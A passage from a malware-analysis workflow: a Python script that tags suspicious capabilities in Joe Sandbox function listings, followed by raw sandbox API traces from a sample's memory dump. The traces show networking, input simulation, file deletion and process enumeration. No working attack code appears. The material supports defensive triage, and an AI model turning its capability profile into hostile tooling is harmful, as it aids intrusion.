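    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
STR_RE = re.compile(r"^•\s*String ID:\s*(?P<val>.*)$")


def parse_blocks(text: str) -> list:
    """Split the listing into function blocks; each starts at a bare 'APIs' line."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"].upper(), m["sub"]))
            continue
        s = STR_RE.match(line)
        if s:  # '$'-separated string cross-references; empty when the function has none
            cur.strings = [x for x in s["val"].split("$") if x.strip()]
    return blocks


# Editor's triage heuristics (not a Joe Sandbox feature): every listed API must
# appear in the function, subcalls included, for the tag to fire.
RULES = {
    "tcp-listener": {"socket", "bind", "listen"},
    "shutdown-or-reboot": {"AdjustTokenPrivileges", "ExitWindowsEx"},
    "recursive-attribute-change": {"FindFirstFileW", "FindNextFileW", "SetFileAttributesW"},
    "file-move-or-delete": {"FindFirstFileW", "MoveFileW", "DeleteFileW"},
}


def classify(block: FuncBlock) -> set:
    names = {a.name for a in block.apis}
    tags = {tag for tag, need in RULES.items() if need <= names}
    # ExitWindowsEx needs SeShutdownPrivilege enabled first; the string xref shows
    # that privilege name is what the LookupPrivilegeValueW subcall resolves.
    if "shutdown-or-reboot" in tags and "SeShutdownPrivilege" in block.strings:
        tags.add("enables-SeShutdownPrivilege")
    return tags


def triage(text: str) -> dict:
    """Map the ref of each tagged function's first call to its capability tags."""
    found = ((b, classify(b)) for b in parse_blocks(text) if b.apis)
    return {b.apis[0].ref: tags for b, tags in found if tags}
```

Feed `triage` the whole "Executed Functions" section of a report and it returns the call-site addresses of every function matching a rule, which is a quicker starting point for an IDA session on the dump than reading the blocks one by one. Because the rules key on API names alone, a hit still has to be cross-checked against the report's behaviour sections before it is treated as something the sample actually did.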

                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BB9A4E
                                                                      • GetSysColor.USER32 ref: 00BB9B23
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00BB9B36
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongProcWindow
                                                                      • String ID: 6ofs
                                                                      • API String ID: 3131106179-1294211291
                                                                      • Opcode ID: fe8b2a339154643637665efcbe1d7354795d5b8cc2576794eb5fbe88edefa66e
                                                                      • Instruction ID: 08d8552b83f8e61b78d8ddf24e6a9fdc02ec759dc16b86ca96e40d021371e809
                                                                      • Opcode Fuzzy Hash: fe8b2a339154643637665efcbe1d7354795d5b8cc2576794eb5fbe88edefa66e
                                                                      • Instruction Fuzzy Hash: 50A1E070258408AFE728AA2D8C99EFF3ADDDB42340F2502C9F702D7691CEA59D45D372
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BDB9D4
                                                                      • _free.LIBCMT ref: 00BDB9F8
                                                                      • _free.LIBCMT ref: 00BDBB7F
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C43700), ref: 00BDBB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00C7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDBC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00C71270,000000FF,?,0000003F,00000000,?), ref: 00BDBC36
                                                                      • _free.LIBCMT ref: 00BDBD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 314583886-0
                                                                      • Opcode ID: 278a3c267ecf761011aabe8a9f46410810fd6d6627e6e871b04105397b2c56c5
                                                                      • Instruction ID: 1cc9f0df43921ccba9589d5f0ba043ad375cb00469ae1b93c480fb39d9fd963f
                                                                      • Opcode Fuzzy Hash: 278a3c267ecf761011aabe8a9f46410810fd6d6627e6e871b04105397b2c56c5
                                                                      • Instruction Fuzzy Hash: 0EC11375A04245EFCB249F698851FAEFBE8EF41360F1A41EBE89497352FB308E419750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                                        • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C0D420
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D470
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0D481
                                                                      • FindClose.KERNEL32(00000000), ref: 00C0D498
                                                                      • FindClose.KERNEL32(00000000), ref: 00C0D4A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: b84687bd24e4a94ed647567bad68014d77eee28653fb7b7afab39fbdced2a402
                                                                      • Instruction ID: d026d12556c35a264308cfb25204968efa8b8961bb9e80d884920b7757929493
                                                                      • Opcode Fuzzy Hash: b84687bd24e4a94ed647567bad68014d77eee28653fb7b7afab39fbdced2a402
                                                                      • Instruction Fuzzy Hash: 97317A7101C3419BC300EFA4D8919AFB7E8AE92340F444A5DF4E293191EB34AA09DB63
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 3bf9c707b03175e0bbf5423fd7963f70d2b4091d6c2f171ccf27f9d4eefdf9ae
                                                                      • Instruction ID: 8884a215ee60958b4e5e4632c6faf76e1395321a925096e4abbc434c245a4816
                                                                      • Opcode Fuzzy Hash: 3bf9c707b03175e0bbf5423fd7963f70d2b4091d6c2f171ccf27f9d4eefdf9ae
                                                                      • Instruction Fuzzy Hash: 9CC22771E086298BDB25DE289D807EAB7F5EB48305F1441EBD85EE7340E775AE818F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C164DC
                                                                      • CoInitialize.OLE32(00000000), ref: 00C16639
                                                                      • CoCreateInstance.OLE32(00C3FCF8,00000000,00000001,00C3FB68,?), ref: 00C16650
                                                                      • CoUninitialize.OLE32 ref: 00C168D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: e11cbf9af3e38dba76dba4ecaa87e110d54e593fa92f4210d965a7f66b7eb820
                                                                      • Instruction ID: 16ff351823bc8b19979b4bf50c8659a57a2642ab7f2deb26f138635589f7083d
                                                                      • Opcode Fuzzy Hash: e11cbf9af3e38dba76dba4ecaa87e110d54e593fa92f4210d965a7f66b7eb820
                                                                      • Instruction Fuzzy Hash: 13D15971508201AFC314EF24C881EABB7E9FF96704F00496DF5958B291EB71EA49CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00C222E8
                                                                        • Part of subcall function 00C1E4EC: GetWindowRect.USER32(?,?), ref: 00C1E504
                                                                      • GetDesktopWindow.USER32 ref: 00C22312
                                                                      • GetWindowRect.USER32(00000000), ref: 00C22319
                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C22355
                                                                      • GetCursorPos.USER32(?), ref: 00C22381
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C223DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                      • String ID:
                                                                      • API String ID: 2387181109-0
                                                                      • Opcode ID: b97803fd062960866b6adb55ffb255831b1d9da701d8aa3e7f27ca1d17918889
                                                                      • Instruction ID: 2cde447ff8172e4ccfb51f25541d0be105b92defe26ff5ac4c5b29196bc6b696
                                                                      • Opcode Fuzzy Hash: b97803fd062960866b6adb55ffb255831b1d9da701d8aa3e7f27ca1d17918889
                                                                      • Instruction Fuzzy Hash: 3A31AD72504325ABD720DF55D849B9FBBADFF88314F000A19F995A7191DB34EA08CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C19B78
                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C19C8B
                                                                        • Part of subcall function 00C13874: GetInputState.USER32 ref: 00C138CB
                                                                        • Part of subcall function 00C13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C13966
                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C19BA8
                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C19C75
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                      • String ID: *.*
                                                                      • API String ID: 1972594611-438819550
                                                                      • Opcode ID: 2a0eaf3ef250f88b435fc70ab497c01df8bc04ad0284ad503b14a86feaaa7b55
                                                                      • Instruction ID: 485559d7c1ee7fa79e2b5c560bf51a9c4e1cdbcae70e6b8ec142272f5e4cf491
                                                                      • Opcode Fuzzy Hash: 2a0eaf3ef250f88b435fc70ab497c01df8bc04ad0284ad503b14a86feaaa7b55
                                                                      • Instruction Fuzzy Hash: 8341717190420A9FCF14DF64C8A5AEEBBF8EF06310F144095E855A2191EB309F95DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00C0AAAC
                                                                      • SetKeyboardState.USER32(00000080), ref: 00C0AAC8
                                                                      • PostMessageW.USER32 ref: 00C0AB36
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00C0AB88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID: 7HR
                                                                      • API String ID: 432972143-1671487442
                                                                      • Opcode ID: 39697747b672f2a7a4e2c3654d866e9a0863bf1ef49676f92f297bf217055f3d
                                                                      • Instruction ID: fa06a0c98f7a387f8dbe845c1992b259a44244ed40f6b16a6da25a71f0cad8ae
                                                                      • Opcode Fuzzy Hash: 39697747b672f2a7a4e2c3654d866e9a0863bf1ef49676f92f297bf217055f3d
                                                                      • Instruction Fuzzy Hash: 9E312671A44318AFFF35CB69CC05BFE7BAAAB44310F04421AF1A1961D1D374CA81D762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$y7HR
                                                                      • API String ID: 0-586130030
                                                                      • Opcode ID: b240b8b9fc52c54809b92568c643f7e85e2a3f818e1786163df22d3a61f891e1
                                                                      • Instruction ID: 0c89df2cd3f0ddf86cef32e174edf15bc2bbc42347eb5b88d696b2c5b3437c06
                                                                      • Opcode Fuzzy Hash: b240b8b9fc52c54809b92568c643f7e85e2a3f818e1786163df22d3a61f891e1
                                                                      • Instruction Fuzzy Hash: 69A26C70E0465ACBDF24CF59C8807AEB7F1FB55314F2481EAE816A7685EB709D81CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                                        • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C2185D
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21884
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00C218DB
                                                                      • WSAGetLastError.WSOCK32 ref: 00C218E6
                                                                      • closesocket.WSOCK32(00000000), ref: 00C21915
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 1601658205-0
                                                                      • Opcode ID: dd1de7b7b0c9995bc8a23c71607fbeef489faec4d6a169a1be7d983c54f2ab70
                                                                      • Instruction ID: 712dd442b65726a4c945c9e307d6d740e0618342f939140220bda0123638a11c
                                                                      • Opcode Fuzzy Hash: dd1de7b7b0c9995bc8a23c71607fbeef489faec4d6a169a1be7d983c54f2ab70
                                                                      • Instruction Fuzzy Hash: B951A271A00210AFDB10AF24D8C6F7A77E5AB45718F188498F919AF3D3C771AE418BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00C2A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 00C2A6BA
  • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
• Process32NextW.KERNEL32(00000000,?), ref: 00C2A79C
• CloseHandle.KERNEL32(00000000), ref: 00C2A7AB
  • Part of subcall function 00BBCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00BE3303,?), ref: 00BBCE8A
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: ce08671b7ccb926df797ef2cb1aa3c92d0a21e873536a6593c78b6d7f685f480
• Instruction ID: ac7b8419a7969f7121177d5dc921350dff8c6ea5c293e1fcc21d47ae928e4da3
• Opcode Fuzzy Hash: ce08671b7ccb926df797ef2cb1aa3c92d0a21e873536a6593c78b6d7f685f480
• Instruction Fuzzy Hash: 0E514DB1508310AFD710EF24D886A6FBBE8FF89754F00896DF59997291EB70D904CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 00C1CE89
• GetLastError.KERNEL32(?,00000000), ref: 00C1CEEA
• SetEvent.KERNEL32(?,?,00000000), ref: 00C1CEFE
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
• Opcode ID: fcb845b3805826ff12294a91ae766fbb4b6aaaa05d2f7bf485d5d8bcb6ae8242
• Instruction ID: 9ad6af8b2ec6e750906179d109e76193ed34f8cf9f1c5cec5caa798177baaaf1
• Opcode Fuzzy Hash: fcb845b3805826ff12294a91ae766fbb4b6aaaa05d2f7bf485d5d8bcb6ae8242
• Instruction Fuzzy Hash: EC21BD71540305ABDB30CFA5C988BABB7F8EF11314F10442EF566A2151E774EE85AB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C082AA
Strings
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: a7aa046ffba498e4d5ff625db1a84cd8dbb13d99ee401912a2efe7f69af2edb7
• Instruction ID: 90b2ff4b3c162037edc6d9cc102aeb13c5c39479eccdf38abc9db09c3c88d1bb
• Opcode Fuzzy Hash: a7aa046ffba498e4d5ff625db1a84cd8dbb13d99ee401912a2efe7f69af2edb7
• Instruction Fuzzy Hash: 09322574A007059FCB28CF59C481A6AB7F1FF48710B15C56EE5AADB3A1EB70E941CB44
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00C15CC1
• FindNextFileW.KERNEL32(00000000,?), ref: 00C15D17
• FindClose.KERNEL32(?), ref: 00C15D5F
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 10e73f78b89c2686e341bfd42b8dcfa986d3aad4a08f8f98a1b71a9a67db2ed6
• Instruction ID: 1c046a8a2bdf3da15263f5a339b286da1e62886ac0369e59f815134953d55f5c
• Opcode Fuzzy Hash: 10e73f78b89c2686e341bfd42b8dcfa986d3aad4a08f8f98a1b71a9a67db2ed6
• Instruction Fuzzy Hash: A951AA74604601DFC714DF28D494E9AB7E4FF8A314F14859DE96A8B3A1CB30ED44CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32 ref: 00BD271A
• SetUnhandledExceptionFilter.KERNEL32 ref: 00BD2724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00BD2731
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
